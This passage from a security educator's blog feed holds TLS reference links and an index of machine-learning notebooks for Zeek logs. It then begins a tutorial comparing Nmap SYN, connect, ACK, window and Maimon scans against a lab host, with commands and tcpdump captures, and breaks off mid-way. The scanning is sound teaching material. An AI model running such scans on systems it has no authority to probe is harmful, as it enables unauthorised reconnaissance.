href="https://developer.mozilla.org/en-US/docs/Web/Security/Transport_Layer_Security">Transport Layer Security - Security on the web | MDN (mozilla.org)</a></div><div><a href="https://wiki.mozilla.org/Security/Server_Side_TLS">Security/Server Side TLS - MozillaWiki</a></div><div><a href="https://datatracker.ietf.org/doc/html/rfc2246">RFC 2246 - The TLS Protocol Version 1.0 (ietf.org)</a></div><div><a href="https://superuser.com/questions/606598/specifying-minor-tls-version-when-using-curl">Specifying minor TLS version when using curl - Super User</a></div><div><a href="https://serverfault.com/questions/910177/what-is-the-meaning-of-the-values-of-the-protocols-field-from-get-tlsciphersuite">windows - What is the meaning of the values of the Protocols field from Get-TlsCipherSuite Output? - Server Fault</a></div><div><a href="https://security.stackexchange.com/questions/29314/what-is-the-significance-of-the-version-field-in-a-tls-1-1-clienthello-message">protocols - What is the significance of the version field in a TLS 1.1+ ClientHello message? - Information Security Stack Exchange</a></div><div><a href="https://github.com/tintinweb/scapy-ssl_tls/blob/eb6df1c940527e65e3f16c662836d7382ba4ace0/scapy_ssl_tls/ssl_tls.py#L241">scapy-ssl_tls/scapy_ssl_tls/ssl_tls.py at eb6df1c940527e65e3f16c662836d7382ba4ace0 · tintinweb/scapy-ssl_tls (github.com)</a></div><div><a href="https://www.youtube.com/watch?v=yPdJVvSyMqk">TLS 1.3 Handshake - YouTube</a></div><div><a href="https://www.youtube.com/watch?v=grRi-aFrbSE">Stanford Seminar - The TLS 1.3 Protocol - YouTube</a></div><div><a href="https://www.ietf.org/archive/id/draft-thomson-tls-keylogfile-00.html">The SSLKEYLOGFILE Format for TLS (ietf.org)</a></div><div><a href="https://my.f5.com/manage/s/article/K50557518">Decrypt SSL traffic with the SSLKEYLOGFILE environment variable on Firefox or Google Chrome using Wireshark (f5.com)</a></div><div><a href="https://www.ietf.org/archive/id/draft-thomson-tls-keylogfile-00.html">The SSLKEYLOGFILE Format for TLS (ietf.org)</a></div><div><a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1">set | Microsoft Learn</a></div><div><a href="https://tshark.dev/export/export_tls/">Tshark | TLS Encrypted</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security">Strict-Transport-Security - HTTP | MDN (mozilla.org)</a></div><div><a href="https://www.chromium.org/hsts/">HTTP Strict Transport Security (chromium.org)</a></div><div><a href="https://hstspreload.org/">HSTS Preload List Submission</a></div><div><a href="https://www.acunetix.com/blog/articles/what-is-hsts-why-use-it/">What Is HSTS and Why Should I Use It? | Acunetix</a></div><div><a href="https://cheapsslsecurity.com/blog/tls-versions-what-they-are-and-which-ones-are-still-supported/">TLS Versions: What They Are and Which Ones Are Still Supported? (cheapsslsecurity.com)</a></div><div><a href="https://www.youtube.com/watch?v=25_ftpJ-2ME">TLS Handshake Deep Dive and decryption with Wireshark - YouTube</a></div></div><div><a href="https://www.youtube.com/watch?v=HMoFvRK4HUo&list=PLIFyRwBY_4bTwRX__Zn4-letrtpSj1mzY">What is SSL & TLS ? What is HTTPS ? What is an SSL VPN? - Practical TLS - YouTube</a></div><div><a href="https://developers.google.com/tink/aead">Authenticated Encryption with Associated Data (AEAD) | Tink | Google for Developers</a><br /><a href="https://stackoverflow.com/questions/7285059/hmac-sha1-in-bash">HMAC-SHA1 in bash - Stack Overflow</a><br /><a href="https://linuxwebdevelopment.com/encrypt-files-openssl/">How To Encrypt Files With OpenSSL (linuxwebdevelopment.com)</a><br /><a href="https://stackoverflow.com/questions/16056135/how-to-use-openssl-to-encrypt-decrypt-files">encryption - How to use OpenSSL to encrypt/decrypt files? - Stack Overflow</a><br /><a href="https://cheapsslsecurity.com/blog/tls-versions-what-they-are-and-which-ones-are-still-supported/">TLS Versions: What They Are and Which Ones Are Still Supported? (cheapsslsecurity.com)</a></div></div></div></div><div><a href="https://www.youtube.com/watch?v=ZkL10eoG1PY">TLS Handshake - EVERYTHING that happens when you visit an HTTPS website - YouTube</a></div><div><a href="https://www.youtube.com/watch?v=HMoFvRK4HUo&list=PLIFyRwBY_4bTwRX__Zn4-letrtpSj1mzY">What is SSL & TLS ? What is HTTPS ? What is an SSL VPN? - Practical TLS - YouTube</a></div><div><br /></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-20233637054436200822023-05-29T16:38:00.004-07:002024-03-18T07:36:43.722-07:00Beginning Machine and Deep Learning with Zeek logs<p><b><span style="font-size: large;">Why this series?</span></b></p><p>When teaching the <b>SANS SEC595: Applied Data Science and Machine Learning for Cybersecurity Professionals </b><a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/">https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/</a> I am always asked,</p><p>"<i>Will you be sharing your demo notebooks?</i>" or "<i>Can we get a copy of your demo notebooks?</i>" or ... well you get the point.</p><p>My answer is always no. Not that I do not want to share, (sharing is caring :-D) , but the demo notebooks by themselves, would not make sense or add real value. Hence, this series! </p><p>This is my supplemental work, similar to what I would do in the demos but with a lot more details and references.</p><p>This series uses primarily Zeek's conn.log file. Notebooks 23 and 24 uses Zeek's DNS and HTTP logs respectively. </p>
The series includes the following: <br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/01%20-%20beginning%20numpy.ipynb" target="_blank">01 - Beginning Numpy</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/02%20-%20beginning%20tensorflow.ipynb" target="_blank">02 - Beginning Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/03%20-%20beginning%20torch.ipynb" target="_blank">03 - Beginning PyTorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/04%20-%20Beginning%20Pandas.ipynb" target="_blank">04 - Beginning Pandas</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/05%20-%20beginning%20matplotlib.ipynb" target="_blank">05 - Beginning Matplotlib</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/06%20-%20Beginning%20Data%20Scaling.ipynb" target="_blank">06 - Beginning Data Scaling</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/07%20-%20Beginning%20Principal%20Component%20Analysis%20(PCA).ipynb" target="_blank">07 - Beginning Principal Component Analysis (PCA)</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/08%20-%20beginning%20Machine%20Learning%20Anomaly%20Detection%20-%20isolation%20forest%20and%20local%20outlier%20factor.ipynb" target="_blank">08 - Beginning Machine Learning Anomaly Detection - Isolation Forest and Local Outlier Factor</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/09%20-%20Beginning%20Unsupervised%20Machine%20Learning%20-%20Clustering%20-%20K-means%20and%20DBSCAN%20-%20version%202.ipynb" target="_blank">09 - Beginning Unsupervised Machine Learning - Clustering - K-means and DBSCAN</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/10%20-%20Beginning%20Supervise%20Learning%20-%20Machine%20Learning%20-%20Logistic%20Regression%2C%20Decision%20Trees%20and%20Metrics.ipynb" target="_blank">
10 - Beginning Supervise Learning - Machine Learning - Logistic Regression, Decision Trees and Metrics <br /></a><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/11%20-%20Beginning%20Linear%20Regression%20-%20Machine%20Learning.ipynb" target="_blank">11 - Beginning Linear Regression - Machine Learning</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/12%20-%20Beginning%20Deep%20Learning%20-%20Anomaly%20Detection%20with%20AutoEncoders%2C%20Tensorflow.ipynb" target="_blank">12 - Beginning Deep Learning - Anomaly Detection with AutoEncoders, Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/13%20-%20Beginning%20Deep%20Learning%20-%20Anomaly%20Detection%20with%20AutoEncoders%2C%20PyTroch.ipynb" target="_blank">13 - Beginning Deep Learning - Anomaly Detection with AutoEncoders, PyTroch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/14.%20-%20Beginning%20Deep%20Learning%2C%20-%20Linear%20Regression%2C%20Tensorflow.ipynb" target="_blank">14 - Beginning Deep Learning - Linear Regression, Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/15%20-%20Beginning%20Deep%20Learning%2C%20-%20Linear%20Regression%2C%20PyTorch.ipynb" target="_blank">15 - Beginning Deep Learning - Linear Regression, PyTorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/16%20-%20Beginning%20Deep%20Learning%2C%20-%20Classification%2C%20Tensorflow.ipynb" target="_blank">16 - Beginning Deep Learning - Classification, Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/17%20-%20Beginning%20Deep%20Learning%2C%20-%20Classification%2C%20Pytorch.ipynb" target="_blank">17 - Beginning Deep Learning - Classification, Pytorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/18%20-%20Beginning%20Deep%20Learning%20Classification%20-%20Regression%20-%20Tensorflow%20-%20Multiple%20Input%2C%20Multiple%20Output%20(MIMO)-%20Functional%20API.ipynb" target="_blank">18 - Beginning Deep Learning - Classification - regression - MIMO - Functional API Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/19%20-%20Beginning%20Deep%20Learning%2C%20-%20Convolution%20Networks%20-%20Tensorflow.ipynb" target="_blank">19 - Beginning Deep Learning - Convolution Networks - Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/20%20-%20Beginning%20Deep%20Learning%2C%20-%20Convolution%20Networks%20-%20PyTorch.ipynb" target="_blank">20 - Beginning Deep Learning - Convolution Networks - PyTorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/21%20-%20Beginning%20Regularization%20-%20Early%20Stopping%2C%20Dropout%2C%20L2%20(Ridge)%2C%20L1%20(Lasso).ipynb" target="_blank">21 - Beginning Regularization - Early Stopping, Dropout, L2 (Ridge), L1 (Lasso)</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/22%20-%20Beginning%20Model%20TFServing.ipynb" target="_blank">22 - Beginning Model TFServing</a><br /><br /><div>
But conn.log is not the only log file within Zeek. Let's build some models for DNS and HTTP logs. <br />
I choose unsupervised, because there are no labels coming with these data. <br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/23%20-%20Continuing%20Anomaly%20Learning%20-%20Zeek%20DNS%20Log%20-%20Machine%20Learning.ipynb" target="_blank">23 - Continuing Anomaly Learning - Zeek DNS Log - Machine Learning</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/24%20-%20Continuing%20Unsupervised%20Learning%20-%20Zeek%20HTTP%20Log%20-%20Machine%20Learning.ipynb" target="_blank">24 - Continuing Unsupervised Learning - Zeek HTTP Log - Machine Learning</a><br /><br /><div>
This was a specific ask by someone in one of my class. <br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/25%20-%20Beginning%20-%20Reading%20Executables%20and%20Building%20a%20Neural%20Network%20to%20make%20predictions%20on%20suspicious%20vs%20non-suspicious%20-%20version%202.ipynb" target="_blank">25 - Beginning - Reading Executables and Building a Neural Network to make predictions on suspicious vs suspicious</a><br /><br />
With 25 notebooks in this series, it is quite possible there are things I could have or should have done differently. <br />
If you find any thing, you think fits those criteria, drop me a line. <br />
If you find this series beneficial, I would greatly appreciate your feedback.
</div><div><br /></div><div>Some other notebooks I think you might find beneficial:</div><div>- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/LinearRegression%20-%20Beginning%20Stochastic%20Gradient%20Descent.ipynb" target="_blank">Beginning Linear Regression: SGD</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/SANS%20SEC595%20-%20Webcast%20-%20AutoEncoder%20Anomaly%20Detection.ipynb" target="_blank">SANS SEC595 - Webcast - AutoEncoder Anomaly Detection</a> <br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/SANS-ML-Presentation-SIEM-Alerts-Predictions.ipynb" target="_blank">SANS-ML-Presentation-SIEM-Alerts-Predictions</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Understanding%20Decision%20Tree%20with%20dTreeviz.ipynb" target="_blank">Understanding Decision Tree with dTreeviz</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/beginning-sql-alchemy-blog.ipynb" target="_blank">Beginning SQLAlchemy</a><br />- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Fourrier%20Transform%20for%20Beacon%20Detection%20-%20Blog.ipynb" target="_blank">Beginning Fourier Transform for Beacon Detection</a></div><div>- <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Continuing%20Back%20Propagation%20-%20Gradient%20Descent%20-%20Tf%20GradientTape%20and%20PyTorch.ipynb" target="_blank">Continuing Back Propagation - Gradient Descent - TF GradientTape and PyTorch</a><br /></div><div><br /></div><div>Get the notebooks by clicking the links above or from my blog: <a href="https://www.securitynik.com/2023/05/beginning-machine-and-deep-learning.html" target="_blank">www.securitynik.com</a> or my <a href="https://github.com/SecurityNik/Data-Science-and-ML/tree/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs" target="_blank">GitHub: github.com/SecurityNik</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com6tag:blogger.com,1999:blog-7303400454979750101.post-73094069628288441082023-01-03T19:31:00.002-08:002023-01-03T19:41:25.307-08:00Understanding NMAP's scan techniques: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans<p>A member of the <a href="https://cybersecurecatalyst.ca/" target="_blank">Toronto Metropolitan University/Rogers Cybersecure Catalyst program</a>, a program I'm currently a mentor for, was using Nmap and could not really see the difference when using the <b>-sW<i> </i></b>and <b>-sM</b> scan techniques. To help that student and others using Nmap, I thought I should put together a quick blog post.</p><p>Before getting into the <b>-sW<i> </i></b>and <b>-sM</b>, let's take a look at some other TCP scan options. This is important as when we run these tools, it is important that we understand what they are doing in the background.</p><p>Staring with Nmap SYN Scan (-sS), we get</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sS 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:04 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00046s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<span style="color: #fcff01;"><b><span>445/tcp open microsoft-ds syn-ack ttl 128</span>
</b></span><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at this scan activity under the hood, we see ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:04:18.309853 IP 10.0.0.108.37698 > 10.0.0.106.445: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 3556209128, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">16:04:18.310294 IP 10.0.0.106.445 > 10.0.0.108.37698: </span><b><span style="color: #fcff01;">Flags [S.]</span></b><span style="color: white;">, seq 2634056672, ack 3556209129, win 64240, options [mss 1460], length 0</span></span>
<span><span style="color: white;">16:04:18.310312 IP 10.0.0.108.37698 > 10.0.0.106.445: </span><b><span style="color: red;">Flags [R]</span></b><span style="color: white;">, seq 3556209129, win 0, length 0</span></span>
</pre></div>
<p></p><p>From above, we see 3 packets. The first represents the stimulus. Nmap sends a <b>SYN [S]</b> packet and receive a <b>SYN/ACK [S.]</b>. This "<b>[S.]"</b>, tells Nmap, this port is "open". Hence the Nmap result above states "<b>open</b>" and the reason states "<b>syn-ack</b>". On a side note, do you know why there is a 3rd packet? The one in red with "<b>[R]"</b>? Leave a comment in the chat if you do. Getting into the 3rd packet is not important for this post but would love to know your comment if you have one.</p><p>Looking at the connect scan (-sT)</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sT 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:04 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00047s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<b><span style="color: #fcff01;"><span>445/tcp open microsoft-ds syn-ack</span>
</span></b>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking at the output, it does not look any different from the Syn Scan (-sS). Keep in mind, both of these scans so far, returned a state of "<b>open</b>" and reason "<b>syn-ack</b>".</p><p>Looking under the hood, we are able to immediately see a difference between the two scans</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:05:04.611618 IP 10.0.0.108.39368 > 10.0.0.106.445:</span><span style="color: #fcff01;"><b> Flags </b><b>[S]</b></span><span style="color: white;">, seq 1022019330, win 64240, options [mss 1460,sackOK,TS val 322962533 ecr 0,nop,wscale 7], length 0</span></span>
<span><span style="color: white;">16:05:04.612014 IP 10.0.0.106.445 > 10.0.0.108.39368: </span><span style="color: #fcff01;"><b>Flags </b><b>[S.]</b></span><span style="color: white;">, seq 486308284, ack 1022019331, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0</span></span>
<span><span style="color: white;">16:05:04.612030 IP 10.0.0.108.39368 > 10.0.0.106.445: </span><span style="color: #fcff01;"><b>Flags </b><b>[.]</b></span><span style="color: white;">, ack 1, win 502, length 0</span></span>
<span><span style="color: white;">16:05:04.612054 IP 10.0.0.108.39368 > 10.0.0.106.445: </span><span style="color: red;"><b>Flags </b><b>[R.]</b></span><span style="color: white;">, seq 1, ack 1, win 502, length 0</span></span>
</pre></div>
<p></p><p>From a simplistic view, the Connect Scan resulted in 4 packets, while the Syn Scan resulted in 3. The first 3 packets, represent the complete TCP 3-way handshake. However, there is a fourth packet. Similar to above, it is not important for what we are interested in. However, if you have the answer, why the "<b>[R.]"</b> packet is there, do leave a comment ;-).</p><p>If we look at the two outputs from Nmap so far, there is really little to no difference. Continuing with the simplistic view of only looking at the Nmap output, only tells you this host is alive.</p><p>Running the ACK Scan</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sA 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:09 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00030s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<span style="color: #fcff01;"><b><span>445/tcp unfiltered microsoft-ds reset ttl 128</span>
</b></span><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.64 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Once again, the output looks basically the same so far as we saw in the earlier two. However, if you pay close attention, you see the state is "<b>unfiltered</b>". Why unfiltered?</p><p><br />Looking under the hood, we see two packets this time.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:09:21.794159 IP 10.0.0.108.50010 > 10.0.0.106.445: </span><b><span style="color: #fcff01;">Flags </span></b><b><span style="color: #fcff01;">[.]</span></b><span style="color: white;">, ack 2598207558, win 1024, length 0</span></span>
<span style="color: white;">16:09:21.794442 IP 10.0.0.106.445 > 10.0.0.108.50010: </span><span style="color: #fcff01;"><b>Flags </b></span><span style="color: #fcff01;"><b>[R]</b></span><span style="color: white;">, seq 2598207558, win 0, length 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>So far, the output from the first two are basically the same, having a state of "<b>open</b>" and this 3rd "<b>unfiltered</b>". The real difference in how they operate can be seen from under the hood. While the two previous examples had a stimulus of "<b>[S]"</b>, this example has a stimulus of "<b>[.]"</b>. Notice also the Nmap output states "unfiltered". Nmap knows the port is unfiltered, because it received the "<b>[R]"</b>. We can confirm this, by looking at the Nmap output, where the reason shows "<b>reset</b>" besides "<b>unfiltered</b>".</p><p>Now to the two scan techniques the user was really concerned about. <b>-sW</b> and <b>-sM</b>. Starting with <b>-sW</b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sW 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:13 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00038s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<span style="color: #fcff01;"><b><span>445/tcp closed microsoft-ds reset ttl 128</span>
</b></span><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.64 seconds</span>
</pre></div>
<p></p><p>Notice the state is "<b>closed</b>". How does Nmap know it is closed? We should now have an understanding of where to find the answer. </p><p>Looking under the hood, we see two packets.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:13:20.105897 IP 10.0.0.108.46454 > 10.0.0.106.445:</span><b><span style="color: #fcff01;"> Flags [.]</span></b><span style="color: white;">, ack 3050815645, win 1024, length 0</span></span>
<span><span style="color: white;">16:13:20.106254 IP 10.0.0.106.445 > 10.0.0.108.46454: </span><b><span style="color: #fcff01;">Flags [R]</span></b><span style="color: white;">, seq 3050815645, win 0, length 0</span></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>This is much the same as was seen in the ACK scan. This is also because this scan is exactly the same as the ACK scan, difference being that it examines the TCP Windows field when a "<b>[R]"</b> packet is returned.</p><p>Wrapping this up with a Maimon scan (-sM)</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo nmap -sM 10.0.0.106 --reason -p 445 --send-ip --reason -Pn</span></b></span>
<span style="color: white;">Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 16:17 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.106</span>
<span style="color: white;">Host is up, received user-set (0.00034s latency).</span>
<span style="color: white;">PORT STATE SERVICE REASON</span>
<b><span style="color: #fcff01;"><span>445/tcp closed microsoft-ds reset ttl 128</span>
</span></b><span style="color: white;">MAC Address: 08:00:27:88:B8:34 (Oracle VirtualBox virtual NIC)</span>
<span style="color: white;">Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Once again, the state is "closed". The output between <b>-sW</b> and <b>-sM</b> looks basically the same. </p><p>Looking under the hood ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
